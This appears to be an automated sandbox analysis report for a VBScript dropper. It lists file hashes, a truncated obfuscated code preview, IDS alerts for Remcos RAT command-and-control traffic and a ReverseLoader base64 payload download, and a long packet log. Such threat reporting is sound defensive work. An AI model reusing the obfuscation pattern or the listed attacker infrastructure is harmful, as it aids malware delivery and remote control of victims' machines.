                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                File type:
                                Entropy (8bit):5.42771490814887
                                TrID:
                                • Visual Basic Script (13500/0) 100.00%
                                File name:scan_doc20241024.vbs
                                File size:15'883 bytes
                                MD5:87e9c9fa5b677d82e0eba303bfee0768
                                SHA1:26c03786558062484c7f275afedea681494c8b7f
                                SHA256:af2848711b8c1b41a6315cd18c52158f1c080f462c3d100df9670f5df265daf0
                                SHA512:9c0cb9d368993d5d79d0b6b1fdb492c2c4bea2d1f5cf8e3ba8b36ca2bde590009de67c99e514ba2007c2a1364da3903ba9387866483d8c8c49c7b0bb50082e30
                                SSDEEP:384:ZFbb3MURKUPfZwuuIz0Y2LPJmxNSiMFpWjufVe:ZhrMUR5uIQY2VW2w
                                TLSH:3C628646F3261FF01E2F43698C02F586476217787D35BA8E24FE94CC18B729ACDA46D9
                                File Content Preview: 'g..AkfmAfkfhad = rRegisggfgterteadkggns2211 & ""..Call Ugsfisging("$co" & "digo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0")..Call Ugsfisging("#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#")..ajjiSpmfm = "" & LenB("ihmagnf
                                Icon Hash:68d69b8f86ab9a86
                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-10-24T08:46:47.756446+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.749983154.216.18.512404TCP
                                2024-10-24T08:46:59.611668+02002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21185.199.108.133443192.168.2.749699TCP
                                2024-10-24T08:47:03.551417+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749701185.199.108.133443TCP
                                2024-10-24T08:47:03.786188+02002020423ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound1185.199.108.133443192.168.2.749701TCP
                                2024-10-24T08:47:03.786188+02002020425ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M11185.199.108.133443192.168.2.749701TCP
                                2024-10-24T08:47:13.088279+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.749712154.216.18.512404TCP
                                2024-10-24T08:47:22.602331+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.749761154.216.18.512404TCP
                                2024-10-24T08:47:32.217285+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.749810154.216.18.512404TCP
                                2024-10-24T08:47:41.706178+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.749859154.216.18.512404TCP
                                2024-10-24T08:47:51.205328+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.749905154.216.18.512404TCP
                                2024-10-24T08:48:00.693845+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.749958154.216.18.512404TCP
                                2024-10-24T08:48:10.219010+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.749977154.216.18.512404TCP
                                2024-10-24T08:48:19.893680+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.749978154.216.18.512404TCP
                                2024-10-24T08:48:29.661701+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.749979154.216.18.512404TCP
                                2024-10-24T08:48:39.444682+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.749980154.216.18.512404TCP
                                2024-10-24T08:48:48.963788+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.749981154.216.18.512404TCP
                                2024-10-24T08:48:58.457696+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.749982154.216.18.512404TCP
                                TimestampSource PortDest PortSource IPDest IP
                                Oct 24, 2024 08:46:56.222501040 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:56.222528934 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:56.222645044 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:56.234818935 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:56.234837055 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:56.861426115 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:56.861510038 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:56.865343094 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:56.865353107 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:56.865748882 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:56.876935959 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:56.923338890 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.348918915 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.397015095 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.465125084 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.465141058 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.465174913 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.465187073 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.465204954 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.465221882 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.465243101 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.465281010 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.465336084 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.467094898 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.467120886 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.467207909 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.467221975 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.467272043 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.583789110 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.583813906 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.583872080 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.583887100 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.583923101 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.584048033 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.585798025 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.585813999 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.585905075 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.585911989 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.586049080 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.586939096 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.586958885 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.586997032 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.587002039 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.587039948 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.587340117 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.626033068 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.626055956 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.626111031 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.626132011 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.626158953 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.626254082 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.703275919 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.703310013 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.703383923 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.703402996 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.703435898 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.703435898 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.703845024 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.703890085 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.703923941 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.703929901 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.703986883 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.703986883 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.705466032 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.705496073 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.705579042 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.705579042 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.705585957 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.705626011 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.706504107 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.706532001 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.706562996 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.706568956 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.706600904 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.706809998 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.707448959 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.707480907 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.707536936 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.707551003 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.707751036 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.745253086 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.745296955 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.745395899 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.745415926 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.745429039 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.745460033 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.821971893 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.821991920 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.822182894 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.822196960 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.822472095 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.822544098 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.822565079 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.822712898 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.822720051 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.822912931 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.823234081 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.823251963 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.823388100 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.823394060 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.823461056 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.823483944 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.823535919 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.823544025 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.823574066 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.823623896 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.827162027 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.827181101 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.827334881 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.827341080 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.827465057 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.836119890 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.864484072 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.864506960 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.864643097 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.864644051 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.864659071 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.864944935 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.940804958 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.940825939 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.940918922 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.940931082 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.940953970 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.941137075 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.941157103 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.941169024 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.941173077 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.941231012 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.941282034 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.941448927 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.941466093 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.941544056 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.941550016 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.941745043 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.941788912 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.941804886 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.941903114 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.941906929 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.941955090 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.942241907 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.942261934 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.942387104 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.942392111 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.942446947 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.942590952 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.942609072 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.942715883 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:57.942719936 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:57.942780018 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.059920073 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.059943914 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.060010910 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.060014963 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.060025930 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.060055017 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.060080051 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.060122967 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.060127974 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.060280085 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.060349941 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.060367107 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.060420036 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.060424089 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.060509920 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.060810089 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.060828924 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.060887098 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.060890913 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.060978889 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.061207056 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.061233044 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.061300039 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.061304092 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.061325073 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.061422110 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.061544895 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.061562061 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.061629057 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.061633110 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.061690092 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.061909914 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.061927080 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.062299013 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.062304020 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.062355042 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.178788900 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.178809881 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.178941965 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.178956985 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.178982019 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.179025888 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.179580927 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.179596901 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.179681063 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.179686069 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.180043936 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.180082083 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.180098057 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.180160046 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.180164099 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.180191994 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.180224895 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.180324078 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.180339098 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.180393934 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.180397987 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.180449009 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.180547953 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.180563927 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.180614948 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.180618048 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.180643082 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.180672884 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.180886030 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.180902004 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.181049109 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.181054115 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.181098938 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.181138992 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.181163073 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.181196928 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.181200981 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.181222916 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.181288958 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.221084118 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.221106052 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.221211910 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.221220016 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.221263885 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.298079967 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.298101902 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.298198938 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.298213005 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.298259974 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.298666954 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.298682928 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.298763990 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.298768997 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.298788071 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.298821926 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.299047947 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.299063921 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.299175978 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.299180984 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.299295902 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.299474955 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.299490929 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.299566031 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.299566031 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.299571037 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.299645901 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.299804926 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.299819946 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.299870968 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.299876928 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.299899101 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.299954891 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.300151110 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.300168991 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.300252914 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.300261021 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.300303936 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.300368071 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.340179920 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.340199947 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.340327024 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.340341091 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.340382099 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.417143106 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.417169094 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.417228937 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.417246103 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.417284966 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.417323112 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.417407036 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.417424917 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.417494059 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.417499065 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.417556047 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.417946100 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.417962074 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.418077946 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.418082952 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.418308973 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.418328047 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.418329954 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.418343067 CEST44349699185.199.108.133192.168.2.7
                                Oct 24, 2024 08:46:58.418359995 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.418497086 CEST49699443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:46:58.418603897 CEST44349699185.199.108.133192.168.2.7
